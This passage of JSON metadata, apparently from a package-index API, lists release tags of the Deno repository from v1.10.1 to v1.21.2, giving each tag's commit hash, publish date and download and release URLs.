parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fden